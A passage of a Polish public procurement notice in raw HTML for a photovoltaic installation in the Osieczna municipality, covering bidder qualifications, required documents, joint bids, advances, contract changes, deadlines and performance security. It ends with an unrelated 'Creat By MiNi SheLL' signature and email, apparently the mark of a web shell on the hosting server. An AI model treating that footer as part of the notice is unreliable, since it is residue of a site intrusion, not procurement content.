jako kierownik budowy/kierownik robót branży konstrukcyjno-budowlanej, polegającym na budowie/przebudowie/rozbudowie/modernizacji/termomodernizacji budynku/obiektu budowlanego, o wartości co najmniej 100.000 zł brutto;<br/>oraz <br/>b)	wskazania osoby (instalatora) posiadającej certyfikat wydany przez Urząd Dozoru Technicznego (UDT) potwierdzający kwalifikacje do instalowania odnawialnych źródeł energii lub świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci w zakresie eksploatacji i dozoru wydane przez Stowarzyszenie Elektryków Polskich (SEP).<br/><br/>	Opis spełnienia warunku:<br/>Zamawiający uzna, ze Wykonawca spełnia warunek, jeżeli przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia według wzoru Załącznika nr 5 do SWZ. <br/>Zamawiający dopuszcza łączenie obu funkcji przez jedną osobę spełniającą wszystkie wymagania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Zamawiający, zgodnie z art. 274 ust. 1 ustawy Pzp przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych aktualnych na dzień ich złożenia:<br/>1)	w odniesieniu do warunków zdolności technicznej lub zawodowej:<br/>a)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień oraz doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 5 do SWZ).<br/>2)	Jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio złożone podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień złożenia.<br/>3)	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (j.t.: Dz. U. z 2021 r. poz. 2070 ze zm.), o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, dane umożliwiające dostęp do tych środków. <br/>4)	Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym Zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego.<br/>5)	Podmiotowe środki dowodowe oraz inne dokumenty, o których mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. składane są zgodnie z przepisami rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.<br/><br/>2.	Informacja dla Wykonawców, którzy mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.<br/>1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu lub informacji – składa dokument lub dokumenty, wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>2)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/>3)	Dokumenty, o których mowa powyżej powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>3.	Pozostałe informacje znajdują się w Rozdz. VI SWZ Etap 2.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym Zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na potwierdzenie spełniania warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia należy – złożyć następujące dokumenty i oświadczenia:<br/>1.	Dokumenty, które Wykonawca ubiegający się o zamówienie publiczne zobowiązany jest złożyć:<br/>1)	Oferta składana jest pod rygorem nieważności w formie elektronicznej podpisana kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, w ogólnie dostępnych formatach danych, w szczególności w formatach: .txt, .rtf, .pdf, .doc, .odt. Oferta musi być sporządzona w języku polskim. Do przygotowania oferty zaleca się skorzystanie z Formularza Oferty (załącznik nr 1 do SWZ). W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru Formularza Oferty, oferta powinna zawierać wszystkie istotne informacje wymagane we wzorze.<br/><br/>2)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (załącznik nr 2a i załącznik 2b). <br/>a)	Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale V ust. 1 SWZ oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale V ust. 2 SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale V SWZ.<br/>b)	Oświadczenie składają odrębnie:<br/>	Wykonawca, każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna).<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>	podmiot udostępniający zasoby, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>3)	Zobowiązanie do oddania do dyspozycji zasobów, o którym mowa w art. 118 ust. 1 ustawy Pzp (wzór – załącznik nr 3 do SWZ) – zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdzający, że stosunek łączący Wykonawcę z podmiotami udostepniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określający w szczególności:<br/>a)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>c)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/>4)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp - jeżeli dotyczy (wzór – załącznik nr 4 do SWZ)<br/>a)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, dostawy lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>5)	Pełnomocnictwo, jeżeli dotyczy.<br/><br/>Szczegółowy wykaz zawarty jest w Rozdz. VI SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego.<br/>2.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty, o których mowa w Rozdziale VI Etap 1 ust. 1 pkt 2 niniejszej SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>5.	Wykonawcy występujący wspólnie muszą, zgodnie z zapisami art. 58 ust. 2 ustawy Pzp ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie przedmiotowego zamówienia publicznego. Do oferty należy dołączyć pełnomocnictwo, które powinno dokładnie określać zakres umocowania.<br/>6.	Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje informacje, korespondencję, itp.<br/>7.	Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>1)	oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>2)	sposób składania dokumentów w ofercie wspólnej:<br/>	dokumenty dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z Wykonawców składających ofertę wspólną we własnym imieniu;<br/>	dokumenty wspólne takie jak np. formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik w imieniu wszystkich Wykonawców składających ofertę wspólną;<br/>3)	kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców.<br/>8.	Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>1)	zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2)	określenie zakresu działania poszczególnych stron umowy, czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości i rękojmi.<br/>9.	Wszelka korespondencja prowadzona przez Zamawiającego będzie wyłącznie z pełnomocnikiem wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający przewiduje udzielenie zaliczki, która zostanie wypłacona zgodnie z warunkami wypłat dofinansowania z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych, tj. Wykonawcy zostanie wypłacona zaliczka w wysokości 5% kwoty wynagrodzenia brutto, o którym mowa w § 3 ust. 1 Projektowanych postanowień umowy, w terminie 30 dni od dnia podpisania umowy na rachunek bankowy wskazany przez Wykonawcę. Zaliczka, o której mowa w zdaniu poprzednim, jest wypłacana z udziału własnego Zamawiającego w finansowaniu inwestycji stanowiącej przedmiot umowy.<br/>Zasady rozliczania opisane zostały w § 3 Projektowanych postanowień umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 7 do SWZ.<br/>2.	Strony przed zawarciem umowy mogą uzupełnić lub zmodyfikować Projektowane postanowienia umowy w zakresie, który nie został określony w ofercie, np. kwestie organizacyjno-porządkowe.<br/>3.	Zamawiający nie dopuszcza istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyłączeniem okoliczności opisanych w Specyfikacji Warunków Zamówienia i Projektowanych postanowieniach umowy.<br/>4.	Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności.<br/>5.	Wszystkie zmiany i uzupełnienia treści umowy stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody i nie mogą być podstawą roszczenia Wykonawcy o dokonanie zmian.<br/><br/>6.	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy, w zakresie i przypadkach oraz zgodnie z warunkami ich wprowadzenia opisanymi w § 17 Projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gmina-osieczna.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-15 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.	Nie podlegają wykluczeniu z postępowania na podstawie: <br/>art. 108 ust. 1 ustawy Pzp, które wystąpiły w odpowiednim okresie wskazanym w art. 111 ustawy Pzp oraz<br/>art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>Termin wykonania:<br/>1.	Strony ustalają, że zamówienie zostanie zrealizowane w terminie do 6 miesięcy licząc od dnia zawarcia umowy.<br/>2.	Termin zakończenia realizacji Przedmiotu umowy oznacza zakończenie i odbiór wszystkich robót budowlanych wraz z uzyskaniem braku sprzeciwu do zawiadomienia o zakończeniu robót, jeżeli będzie to wymagane przepisami prawa. Termin zakończenia robót budowlanych oznacza zakończenie wszystkich robót budowlanych, potwierdzony wpisem w dzienniku budowy przez Kierownika Budowy i Inspektora Nadzoru.<br/>3.	Wykonawca przedłoży Zamawiającemu uzgodniony z Inspektorem Nadzoru szczegółowy harmonogram rzeczowy realizacji robót w terminie 7 dni od dnia zawarcia umowy. W harmonogramie rzeczowym wykonawca zobowiązany jest uwzględnić wszystkie wytyczne Inspektora Nadzoru i Zamawiającego. Wykonawca zobowiązany jest sporządzić harmonogram z podziałem na wszystkie miesiące realizacji. <br/>4.	W przypadku zaistnienia takiej konieczności, Wykonawca przedłoży do akceptacji aktualizację harmonogramu rzeczowego w terminie 7 dni od powzięcia wiedzy o konieczności zmiany harmonogramu. Inspektor Nadzoru i Zamawiający mogą wnieść uwagi do przedłożonego harmonogramu lub jego aktualizacji w terminie 7 dni, a Wykonawca jest zobowiązany do ich uwzględnienia w ciągu 3 dni od dnia ich otrzymania. Zmiany harmonogramu rzeczowego dopuszczane są wyłącznie po uzyskaniu pisemnej, uprzedniej zgody Zamawiającego. <br/><br/>Informacje dotyczące zabezpieczenia należytego wykonania umowy:<br/>1.	Wykonawca zobowiązany jest przed zawarciem umowy wnieść zabezpieczenie należytego wykonania umowy w wysokości 3% ceny brutto podanej w ofercie. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.<br/>2.	Zabezpieczenie może być wnoszone, według wyboru Wykonawcy, w jednej lub w kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;<br/>c)	gwarancjach bankowych;<br/>d)	gwarancjach ubezpieczeniowych;<br/>e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy nr 84 8341 0000 0000 0156 2000 0007 (Bank Spółdzielczy w Skórczu) z adnotacją: budowa instalacji fotowoltaicznej w gm.Osieczna.<br/>4.	Szczegółowe informacje zawiera Rozdz. XVIII SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com